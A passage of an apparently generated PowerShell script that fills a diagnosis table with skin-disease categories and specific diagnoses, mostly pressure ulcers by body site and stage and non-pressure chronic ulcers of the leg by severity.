$DiagnosisList.Rows.Add("Other epidermal thickening","Acquired keratosis [keratoderma] palmaris et plantaris") + $null = $DiagnosisList.Rows.Add("Other epidermal thickening","Keratosis punctata (palmaris et plantaris)") + $null = $DiagnosisList.Rows.Add("Other epidermal thickening","Xerosis cutis") + $null = $DiagnosisList.Rows.Add("Other epidermal thickening","Other specified epidermal thickening") + $null = $DiagnosisList.Rows.Add("Other epidermal thickening","Epidermal thickening, unspecified") + $null = $DiagnosisList.Rows.Add("Keratoderma in diseases classified elsewhere","Keratoderma in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Transepidermal elimination disorders","Keratosis follicularis et parafollicularis in cutem penetrans") + $null = $DiagnosisList.Rows.Add("Transepidermal elimination disorders","Reactive perforating collagenosis") + $null = $DiagnosisList.Rows.Add("Transepidermal elimination disorders","Elastosis perforans serpiginosa") + $null = $DiagnosisList.Rows.Add("Transepidermal elimination disorders","Other transepidermal elimination disorders") + $null = $DiagnosisList.Rows.Add("Transepidermal elimination disorders","Transepidermal elimination disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Pyoderma gangrenosum","Pyoderma gangrenosum") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified elbow","Pressure ulcer of unspecified elbow, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right elbow","Pressure ulcer of right elbow, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left elbow","Pressure ulcer of left elbow, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified part of back","Pressure ulcer of unspecified part of back, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right upper back","Pressure ulcer of right upper back, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left upper back","Pressure ulcer of left upper back, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right lower back","Pressure ulcer of right lower back, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left lower back","Pressure ulcer of left lower back, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of sacral region","Pressure ulcer of sacral region, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified hip","Pressure ulcer of unspecified hip, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right hip","Pressure ulcer of right hip, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left hip","Pressure ulcer of left hip, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified buttock","Pressure ulcer of unspecified buttock, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right buttock","Pressure ulcer of right buttock, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left buttock","Pressure ulcer of left buttock, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of contiguous site of back, buttock and hip","Pressure ulcer of contiguous site of back, buttock and hip, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified ankle","Pressure ulcer of unspecified ankle, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right ankle","Pressure ulcer of right ankle, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left ankle","Pressure ulcer of left ankle, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified heel","Pressure ulcer of unspecified heel, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of right heel","Pressure ulcer of right heel, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of left heel","Pressure ulcer of left heel, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of head","Pressure ulcer of head, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, unstageable") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of other site","Pressure ulcer of other site, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, unspecified stage") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, stage 1") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, stage 2") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, stage 3") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, stage 4") + $null = $DiagnosisList.Rows.Add("Pressure ulcer of unspecified site","Pressure ulcer of unspecified site, unstageable") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Lichen sclerosus et atrophicus") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Anetoderma of Schweninger-Buzzi") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Anetoderma of Jadassohn-Pellizzari") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Atrophoderma of Pasini and Pierini") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Acrodermatitis chronica atrophicans") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Scar conditions and fibrosis of skin") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Striae atrophicae") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Other atrophic disorders of skin") + $null = $DiagnosisList.Rows.Add("Atrophic disorders of skin","Atrophic disorder of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Hypertrophic disorders of skin","Hypertrophic scar") + $null = $DiagnosisList.Rows.Add("Hypertrophic disorders of skin","Other hypertrophic disorders of the skin") + $null = $DiagnosisList.Rows.Add("Hypertrophic disorders of skin","Hypertrophic disorder of the skin, unspecified") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Granuloma annulare") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Necrobiosis lipoidica, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Granuloma faciale [eosinophilic granuloma of skin]") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Foreign body granuloma of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Other granulomatous disorders of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Granulomatous disorders of skin and subcutaneous tissue","Granulomatous disorder of the skin and subcutaneous tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Lupus erythematosus","Discoid lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Lupus erythematosus","Subacute cutaneous lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Lupus erythematosus","Other local lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Localized scleroderma [morphea]") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Linear scleroderma") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Calcinosis cutis") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Sclerodactyly") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Gottron's papules") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Poikiloderma vasculare atrophicans") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Ainhum") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Other specified localized connective tissue disorders") + $null = $DiagnosisList.Rows.Add("Other localized connective tissue disorders","Localized connective tissue disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Vasculitis limited to skin, not elsewhere classified","Livedoid vasculitis") + $null = $DiagnosisList.Rows.Add("Vasculitis limited to skin, not elsewhere classified","Erythema elevatum diutinum") + $null = $DiagnosisList.Rows.Add("Vasculitis limited to skin, not elsewhere classified","Other vasculitis limited to the skin") + $null = $DiagnosisList.Rows.Add("Vasculitis limited to skin, not elsewhere classified","Vasculitis limited to the skin, unspecified") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified thigh","Non-pressure chronic ulcer of unspecified thigh with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right thigh","Non-pressure chronic ulcer of right thigh with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left thigh","Non-pressure chronic ulcer of left thigh with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified calf","Non-pressure chronic ulcer of unspecified calf with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right calf","Non-pressure chronic ulcer of right calf with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left calf","Non-pressure chronic ulcer of left calf with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified ankle","Non-pressure chronic ulcer of unspecified ankle with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right ankle","Non-pressure chronic ulcer of right ankle with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left 